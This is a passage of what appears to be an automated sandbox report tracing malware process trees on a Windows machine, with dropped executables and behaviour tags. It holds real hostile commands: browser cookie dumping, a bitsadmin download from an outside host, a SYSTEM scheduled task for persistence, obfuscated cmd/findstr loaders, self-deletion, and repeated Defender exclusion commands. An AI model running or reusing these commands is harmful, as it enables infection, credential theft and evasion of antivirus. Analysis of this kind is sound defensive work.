        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:6524
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:3204
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdu0ke1q.on1\setup.exe & exit
        5⤵
        
        PID:5512
      - C:\Users\Admin\AppData\Local\Temp\bdu0ke1q.on1\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\bdu0ke1q.on1\setup.exe
        6⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\bdu0ke1q.on1\setup.exe"
        7⤵
        
        PID:972
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        8⤵
        Runs ping.exe
        
        PID:5508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wyv34fd3.vjz\askinstall39.exe & exit
        5⤵
        
        PID:6040
      - C:\Users\Admin\AppData\Local\Temp\wyv34fd3.vjz\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\wyv34fd3.vjz\askinstall39.exe
        6⤵
        Executes dropped EXE
        
        PID:5220
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:4808
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0jjyiiw.eja\Setup_v3.exe & exit
        5⤵
        
        PID:5672
      - C:\Users\Admin\AppData\Local\Temp\g0jjyiiw.eja\Setup_v3.exe
        
        C:\Users\Admin\AppData\Local\Temp\g0jjyiiw.eja\Setup_v3.exe
        6⤵
        Executes dropped EXE
        
        PID:5892
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        7⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
        7⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        8⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
        9⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
        
        Fessura.exe.com Z
        9⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:5300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
        11⤵
        Creates scheduled task(s)
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
        11⤵
        Executes dropped EXE
        
        PID:6176
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 30
        9⤵
        Runs ping.exe
        
        PID:5784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gy4h1stm.wdm\y1.exe & exit
        5⤵
        
        PID:4880
      - C:\Users\Admin\AppData\Local\Temp\gy4h1stm.wdm\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\gy4h1stm.wdm\y1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5492
        
        C:\Users\Admin\AppData\Local\Temp\Oy3L2GjKns.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Oy3L2GjKns.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:4632
        
        C:\Users\Admin\AppData\Roaming\1620243161582.exe
        
        "C:\Users\Admin\AppData\Roaming\1620243161582.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620243161582.txt"
        8⤵
        Executes dropped EXE
        
        PID:3832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Oy3L2GjKns.exe"
        8⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:5092
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gy4h1stm.wdm\y1.exe"
        7⤵
        
        PID:5652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Executes dropped EXE
        
        PID:4416
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:6124
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe & exit
        5⤵
        
        PID:5588
      - C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe
        6⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\dg1w52vd.3ob\toolspab1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulfzhzj1.2q2\005.exe & exit
        5⤵
        
        PID:4112
      - C:\Users\Admin\AppData\Local\Temp\ulfzhzj1.2q2\005.exe
        
        C:\Users\Admin\AppData\Local\Temp\ulfzhzj1.2q2\005.exe
        6⤵
        Executes dropped EXE
        
        PID:5512
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzn0dpyh.pcd\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:5480
      - C:\Users\Admin\AppData\Local\Temp\rzn0dpyh.pcd\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\rzn0dpyh.pcd\SunLabsPlayer.exe /S
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:5768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        Blocklisted process makes network request
        Executes dropped EXE
        
        PID:5800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:1592
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:6048
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:4616
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pYteES4lQZFgwzl9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:1480
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -psYh2fEpZVkJfYf1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:7548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:5916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        Executes dropped EXE
        
        PID:7740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll" NXfSHgjpzLhX
        7⤵
        
        PID:6224
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll" NXfSHgjpzLhX
        8⤵
        Drops file in System32 directory
        
        PID:6708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:6172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:6124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:5792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv2CDF.tmp\tempfile.ps1"
        7⤵
        
        PID:1496
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Executes dropped EXE
        
        PID:1684

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
PID:4076
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4304

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4188
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DBB44301BDC819CF733853A069EBA1F2 C
  2⤵
  - Loads dropped DLL
  PID:5012
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3BC7BB8157CA4D3E91857813C72CC18C
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:4556
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5976
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B3FCDA38F13E92097B17F4045B620BEE E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:2228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4988

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5828

C:\Users\Admin\AppData\Local\Temp\C41.exe
C:\Users\Admin\AppData\Local\Temp\C41.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4220

C:\Users\Admin\AppData\Local\Temp\19EE.exe
C:\Users\Admin\AppData\Local\Temp\19EE.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:5460

C:\Users\Admin\AppData\Local\Temp\2C9C.exe
C:\Users\Admin\AppData\Local\Temp\2C9C.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:3788
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:5484
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:4644
- C:\Users\Admin\AppData\Local\Temp\2C9C.exe
  "C:\Users\Admin\AppData\Local\Temp\2C9C.exe"
  2⤵
  PID:4104
- C:\Users\Admin\AppData\Local\Temp\2C9C.exe
  "C:\Users\Admin\AppData\Local\Temp\2C9C.exe"
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Users\Admin\AppData\Local\Temp\2C9C.exe
  "C:\Users\Admin\AppData\Local\Temp\2C9C.exe"
  2⤵
  PID:4452
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im 2C9C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2C9C.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5852
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im 2C9C.exe /f
      4⤵
      Kills process with taskkill
      PID:5580
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:4916
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3788 -s 1484
  2⤵
  - Program crash
  PID:5068

C:\Users\Admin\AppData\Local\Temp\3140.exe
C:\Users\Admin\AppData\Local\Temp\3140.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4712
- C:\Users\Admin\AppData\Local\Temp\3140.exe
  "C:\Users\Admin\AppData\Local\Temp\3140.exe"
  2⤵
  - Executes dropped EXE
  PID:5372

C:\Users\Admin\AppData\Local\Temp\3529.exe
C:\Users\Admin\AppData\Local\Temp\3529.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4956

C:\Users\Admin\AppData\Local\Temp\3932.exe
C:\Users\Admin\AppData\Local\Temp\3932.exe
1⤵
- Executes dropped EXE
PID:4492
- C:\Windows\SysWOW64\at.exe
  "C:\Windows\System32\at.exe"
  2⤵
  PID:1360
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c aOfiOrAQXMwQbejRxngsEXftIiahnVRVsrHIboQugmloFLOHTjdLTJSxnlnHKhswVymzxEzkHortNunX & C:\Windows\System32\cmd.exe < Viscere.xll
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe
    3⤵
    PID:5244
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^btwCyeafUCTExwKGoPydOFoWmoEwfCqEVKpycYOURJeGZvjryQEabMASVyrWbsqaBgJKSEkpqlnyDCWrWBVnXIippdpdUSbAIKt$" Lunga.xll
      4⤵
      PID:7244
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com
      Mutato.exe.com f
      4⤵
      Executes dropped EXE
      PID:4676
    - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com f
        5⤵
        Executes dropped EXE
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:5772
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        6⤵
        Executes dropped EXE
        
        PID:6840
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        6⤵
        Executes dropped EXE
        
        PID:3728
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
        6⤵
        Executes dropped EXE
        
        PID:6516
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      Runs ping.exe
      PID:6284

C:\Users\Admin\AppData\Local\Temp\5229.exe
C:\Users\Admin\AppData\Local\Temp\5229.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:4948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:4472
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:4512
- C:\Users\Admin\AppData\Local\Temp\5229.exe
  "C:\Users\Admin\AppData\Local\Temp\5229.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5184
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5229.exe"
    3⤵
    PID:2284
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:4804
- - C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe
    "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe"
    3⤵
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    PID:5240
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:4524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:5524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      Executes dropped EXE
      PID:4104
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:4128
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6092
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:5444
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:5476
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:4364
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4992
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6104
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:5592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:4804
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6064
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6404
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6568
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe" -Force
      4⤵
      PID:6636
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
      4⤵
      PID:6716
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
